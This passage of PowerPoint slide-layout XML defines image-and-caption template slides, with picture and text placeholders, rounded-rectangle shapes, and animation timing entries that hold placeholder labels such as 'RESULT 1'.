                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="74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900" decel="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4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4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4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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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3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3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3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9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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="105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900" decel="100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/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="79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7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7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7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7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77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7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7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8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7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7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/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="34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3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3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35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/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="40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4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4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41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4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4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ree images with resul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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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76" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="5442591"/>
            <a:ext cx="3525147" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rounded Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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79" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868539" y="4815844"/>
            <a:ext cx="648408" cy="560681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="103884" rIns="0" bIns="103884" anchor="b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0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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77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1567748" y="4799427"/>
            <a:ext cx="2259187" cy="3453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1" baseline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smtClean="0"/>
              <a:t>RESULT 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567748" y="5174218"/>
            <a:ext cx="2259187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31" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4345517" y="5442591"/>
            <a:ext cx="3525147" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610805" y="4815844"/>
            <a:ext cx="648408" cy="560681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="103884" rIns="0" bIns="103884" anchor="b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0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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5310014" y="4799427"/>
            <a:ext cx="2259187" cy="3453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1" baseline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smtClean="0"/>
              <a:t>RESULT 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5310014" y="5174218"/>
            <a:ext cx="2259187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37" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="71" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8050904" y="5442591"/>
            <a:ext cx="3525147" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8327069" y="4815844"/>
            <a:ext cx="648408" cy="560681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="103884" rIns="0" bIns="103884" anchor="b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0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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="74" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9026279" y="4799427"/>
            <a:ext cx="2259187" cy="3453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1" baseline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smtClean="0"/>
              <a:t>RESULT 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="75" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9026279" y="5174218"/>
            <a:ext cx="2259187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28" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="1303484"/>
            <a:ext cx="3525147" cy="3172632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sz="quarter" idx="76"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4345517" y="1303484"/>
            <a:ext cx="3525147" cy="3172632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43" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="77"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8050904" y="1303484"/>
            <a:ext cx="3525147" cy="3172632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400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400" fill="hold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400" fill="hold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300" fill="hold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300" fill="hold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300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4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4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4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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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3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3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3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4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4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4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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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3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3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3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2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="76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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="88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9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7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7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7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7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77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7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7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8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7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7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3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3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35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4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4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41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4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4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/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="43" grpId="0"/>
    </p:bld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images with ca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"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721784" y="1394011"/>
            <a:ext cx="4967816" cy="1530161"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="1275134">
                <a:moveTo>
                  <a:pt x="360890" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3364972" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3564286" y="0"/>
                  <a:pt x="3725862" y="161576"/>
                  <a:pt x="3725862" y="360890"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3725862" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="360890"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="161576"/>
                  <a:pt x="161576" y="0"/>
                  <a:pt x="360890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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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8" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721784" y="2929889"/>
            <a:ext cx="4967816" cy="723899"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="603249">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3725862" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725862" y="280197"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3725862" y="458614"/>
                  <a:pt x="3581227" y="603249"/>
                  <a:pt x="3402810" y="603249"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="323052" y="603249"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="144635" y="603249"/>
                  <a:pt x="0" y="458614"/>
                  <a:pt x="0" y="28019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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2991377"/>
            <a:ext cx="4419600" cy="259199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2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42" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="3286158"/>
            <a:ext cx="4419600" cy="30667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108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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="66"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6608235" y="1394011"/>
            <a:ext cx="4967816" cy="1530161"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="1275134">
                <a:moveTo>
                  <a:pt x="360890" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3364972" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3564286" y="0"/>
                  <a:pt x="3725862" y="161576"/>
                  <a:pt x="3725862" y="360890"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3725862" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="360890"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="161576"/>
                  <a:pt x="161576" y="0"/>
                  <a:pt x="360890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44" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6608235" y="2929889"/>
            <a:ext cx="4967816" cy="723899"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="603249">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3725862" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725862" y="280197"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3725862" y="458614"/>
                  <a:pt x="3581227" y="603249"/>
                  <a:pt x="3402810" y="603249"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="323052" y="603249"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="144635" y="603249"/>
                  <a:pt x="0" y="458614"/>
                  <a:pt x="0" y="280197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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953251" y="2991377"/>
            <a:ext cx="4419600" cy="259199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2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50" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953251" y="3286158"/>
            <a:ext cx="4419600" cy="30667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108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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="69"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721784" y="4061011"/>
            <a:ext cx="4967816" cy="1530161"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="1275134">
                <a:moveTo>
                  <a:pt x="360890" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3364972" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3564286" y="0"/>
                  <a:pt x="3725862" y="161576"/>
                  <a:pt x="3725862" y="360890"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3725862" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="360890"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="161576"/>
                  <a:pt x="161576" y="0"/>
                  <a:pt x="360890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52" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721784" y="5596889"/>
            <a:ext cx="4967816" cy="723899"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="603249">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3725862" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725862" y="280197"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3725862" y="458614"/>
                  <a:pt x="3581227" y="603249"/>
                  <a:pt x="3402810" y="603249"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="323052" y="603249"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="144635" y="603249"/>
                  <a:pt x="0" y="458614"/>
                  <a:pt x="0" y="28019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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="5658377"/>
            <a:ext cx="4419600" cy="259199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2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54" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="71" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="5953158"/>
            <a:ext cx="4419600" cy="30667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108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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="72"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6608235" y="4061011"/>
            <a:ext cx="4967816" cy="1530161"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="1275134">
                <a:moveTo>
                  <a:pt x="360890" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3364972" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3564286" y="0"/>
                  <a:pt x="3725862" y="161576"/>
                  <a:pt x="3725862" y="360890"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3725862" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1275134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="360890"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="161576"/>
                  <a:pt x="161576" y="0"/>
                  <a:pt x="360890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56" name="Rounded Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6608235" y="5596889"/>
            <a:ext cx="4967816" cy="723899"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3725862" h="603249">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3725862" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725862" y="280197"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3725862" y="458614"/>
                  <a:pt x="3581227" y="603249"/>
                  <a:pt x="3402810" y="603249"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="323052" y="603249"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="144635" y="603249"/>
                  <a:pt x="0" y="458614"/>
                  <a:pt x="0" y="280197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7" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953251" y="5658377"/>
            <a:ext cx="4419600" cy="259199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2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58" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="74" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953251" y="5953158"/>
            <a:ext cx="4419600" cy="30667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108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endParaRPr lang="en-US" dirty="0" smtClean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1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4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4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4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3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4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4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4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5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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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4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4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4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7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2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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4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4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4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8" grpId="0" animBg="1"/>
      <p:bldP spid="4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3" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="4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1" grpId="0"/>
      <p:bldP spid="52" grpId="0" animBg="1"/>
      <p:bldP spid="53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3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5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/>
      <p:bldP spid="56" grpId="0" animBg="1"/>
      <p:bldP spid="57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7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5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ircle imag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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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41" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603254" y="4267391"/>
            <a:ext cx="2497151" cy="259199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2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42" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603254" y="4562173"/>
            <a:ext cx="2497151" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603254" y="1877692"/>
            <a:ext cx="2497151" cy="2247436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35" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448053" y="4267391"/>
            <a:ext cx="2497151" cy="259199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2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36" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448053" y="4562173"/>
            <a:ext cx="2497151" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="68"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448053" y="1877692"/>
            <a:ext cx="2497151" cy="2247436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39" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6225121" y="4267391"/>
            <a:ext cx="2497151" cy="259199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2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40" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6225121" y="4562173"/>
            <a:ext cx="2497151" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
